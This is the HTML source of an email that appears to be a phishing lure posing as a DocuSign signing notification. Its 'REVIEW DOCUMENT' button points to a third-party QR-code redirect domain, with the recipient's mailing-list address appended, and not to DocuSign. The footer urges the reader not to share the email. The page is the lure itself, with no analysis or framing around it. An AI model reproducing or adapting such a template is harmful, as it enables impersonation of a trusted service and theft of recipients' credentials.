<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>DocuSign Notification</title>
<style>
body {
background: #f6f6f6;
margin: 0;
font-family: Arial, sans-serif;
}
.container {
max-width: 600px;
margin: 40px auto;
background: #fff;
padding: 0;
border-radius: 6px;
box-shadow: 0 2px 6px rgba(0, 0, 0, 0.09);
}
.header {
padding: 16px 0 0 16px;
font-weight: bold;
color: #222;
font-size: 16px;
}
.main-box {
background: #193b63;
text-align: center;
padding: 34px 0 38px 0;
}
.main-text {
color: #fff;
margin-bottom: 22px;
font-size: 16px;
}
.button {
background: #ffc13b;
color: #1c2e4a;
text-decoration: none;
font-weight: bold;
padding: 14px 34px;
border-radius: 6px;
font-size: 18px;
display: inline-block;
}
.footer {
padding: 29px 16px 16px 16px;
color: #666;
font-size: 13px;
}
.footer strong {
display: block;
margin-top: 8px;
}
.footer a {
color: #193b63;
text-decoration: underline;
word-break: break-all;
}
</style>
</head>
<body>
<div class="container">
<div class="header">DocuSign</div>
<div class="main-box">
<div class="main-text">You have received a document to review and sign.</div><a href="https://myqrcode.mobi/0c3c11ad#pkg-gnome-maintainers@lists.alioth.debian.org" class="button">REVIEW DOCUMENT</a>
</div>
<div class="footer"><a href="#">pkg-gnome-maintainers@lists.alioth.debian.org</a> <strong>Do Not Share This Email</strong> This email contains a secure link to DocuSign. Please do not share this email, link, or access code with others.</div>
</div>
</body>
</html>